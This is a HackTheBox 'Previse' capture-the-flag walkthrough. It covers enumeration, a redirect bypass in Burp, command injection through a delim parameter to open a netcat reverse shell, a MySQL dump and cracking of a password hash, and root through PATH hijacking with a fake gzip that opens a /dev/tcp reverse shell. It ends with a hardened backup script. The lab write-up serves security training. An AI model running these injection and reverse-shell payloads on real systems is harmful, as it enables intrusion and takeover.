HackTheBox – Previse Walkthrough
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.104
┌──(rootkali)-[/home/kali/Downloads]
└─# gobuster dir --url http://10.10.11.104 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
┌──(rootkali)-[/home/kali/Downloads]
└─# nikto -h 10.10.11.104
We get:
/config.php
Requesting config.php directly returned an empty page.
Let's see what's in nav.php, which gobuster also found.
In that navigation I found an option to create an account.
http://10.10.11.104/config.php
Now click on the Account option,
which lets me create an account on this website, but the page is redirected to login.php.
So I used Burp to create an account.
First, open Burp Suite and capture the request.
Once the request is captured, right-click it, choose "Do intercept" and select "Response to this request" (shown in the image below).
Then forward the request so that its response is held in Burp.
Now you get the response in Burp: change the status code from 302 to 200 OK.
This trick works because the server still sends the page body along with the redirect; with the 302 changed to 200 and the response forwarded to the browser, the browser shows the form instead of following the redirect.
Now I was able to create an account on the website.
Now let's create a username and password.
Click on files
┌──(rootkali)-[/home/kali/Downloads]
└─# mkdir test1
┌──(rootkali)-[/home/kali/Downloads]
└─# cp siteBackup.zip test1/
┌──(rootkali)-[/home/kali/Downloads]
└─# cd test1
┌──(rootkali)-[/home/kali/Downloads/test1]
└─# unzip siteBackup.zip
┌──(rootkali)-[/home/kali/Downloads/test1]
└─# cat config.php
Now that we have this juicy info, let's try to get a reverse shell.
Opening the file logs page I could see the delimiter option, so I captured that request in Burp.
From the extracted site backup zip we can see file_logs.php.
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -nlvp 5121
So let's intercept the request and try to get a reverse shell.
From the extracted backup we can see the handler is file_logs.php:
http://10.10.11.104/file_logs.php
click on submit
delim=comma%26nc+-e+/bin/sh+10.10.14.8+5121
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@previse:/home/m4lwhere$ mysql -u root -D previse -p
password: mySQL_p@ssw0rd!:)
mysql> show tables;
mysql> SELECT * FROM accounts;
Now it shows the accounts and their passwords.
So the username is m4lwhere and the password is stored as a hash.
Next, we are going to crack the hash using john
with the rockyou.txt wordlist.
So the password is ilovecody112235!
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh m4lwhere@10.10.11.104
Next we are going to go after the root flag via privilege escalation.
PRIVILEGE ESCALATION
Now let's see which commands this user can run with sudo.
m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
Analysing the script further, I found a path injection vulnerability: it calls gzip by its bare name, so whichever gzip appears first in PATH is executed as root.
So now go into the /tmp folder.
Transfer the payload; it must be named gzip.
Before that, set up a listener on our local machine.
Open another terminal:
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -nlvp 5121
Next, go back to the target machine and enter the commands below.
First, create the payload (shown in the image below):
m4lwhere@previse:~$ cd /tmp
m4lwhere@previse:/tmp$ ls
m4lwhere@previse:/tmp$ echo "bash -i >& /dev/tcp/10.10.14.8/5121 0>&1" > gzip
m4lwhere@previse:/tmp$ chmod 777 gzip
m4lwhere@previse:/tmp$ export PATH=/tmp:$PATH
m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh
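The hijack only works because the script trusts the PATH it inherits and sudo passed the user's modified PATH through to it (sudo's default secure_path setting would have replaced PATH with a fixed list of system directories). As an added example that is not part of the box or of this write-up, here is a hardened rewrite of such a backup script in POSIX sh, together with a check that flags a PATH containing entries outside that secure_path allowlist. The secure_backup and path_is_secure function names, the use of a single source file, and the sample log line are my own assumptions and are not taken from /opt/scripts/access_backup.sh.

```shell
#!/bin/sh
# Hardened backup script (constructed example, not the box's /opt/scripts/access_backup.sh).
# Two defences against PATH hijacking when the script runs under sudo:
#   1. the script sets PATH itself instead of trusting the caller's environment;
#   2. the gzip binary is resolved and its directory checked before it is executed.

# Directories sudo's default secure_path allows (colon-separated so it splits like PATH).
# Anything else, e.g. /tmp or a home directory, is a hijack risk.
SAFE_DIRS="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Constructed sample log line used by the usage example; not real traffic.
SAMPLE_LOG_LINE='10.0.0.1 - - [01/Jan/1970:00:00:00 +0000] "GET /file_logs.php HTTP/1.1" 200 512'

# path_is_secure PATHSTRING -> 0 if every entry is in SAFE_DIRS, 1 otherwise.
path_is_secure() {
    # An empty entry (leading, trailing or doubled colon) means "current directory": reject it.
    case ":$1:" in
        *::*) return 1 ;;
    esac
    _old_ifs=$IFS
    IFS=:
    for _dir in $1; do
        _ok=1
        for _safe in $SAFE_DIRS; do
            [ "$_dir" = "$_safe" ] && _ok=0
        done
        if [ "$_ok" -ne 0 ]; then
            IFS=$_old_ifs
            return 1
        fi
    done
    IFS=$_old_ifs
    return 0
}

# secure_backup SRC DEST -> gzip SRC into DEST using a fixed PATH and a verified gzip binary.
# The body is a subshell so the PATH override does not leak into the caller's shell.
secure_backup() (
    _src=$1
    _dest=$2
    [ -f "$_src" ] || exit 2

    # Ignore whatever PATH the caller (or sudo) handed us.
    PATH=/usr/bin:/bin
    export PATH

    # Resolve gzip and refuse to run if it does not live in an allowlisted directory.
    _gzip=$(command -v gzip) || exit 3
    path_is_secure "${_gzip%/*}" || exit 4

    "$_gzip" -c "$_src" > "$_dest"
)
```

Usage is `secure_backup /var/log/apache2/access.log /var/backups/access.log.gz` (paths assumed, not taken from the box); with a poisoned `PATH=/tmp:$PATH` the call still compresses the file with the system gzip, and `path_is_secure "$PATH"` can be used in a sudoers or hardening check to spot environments where secure_path is not in force.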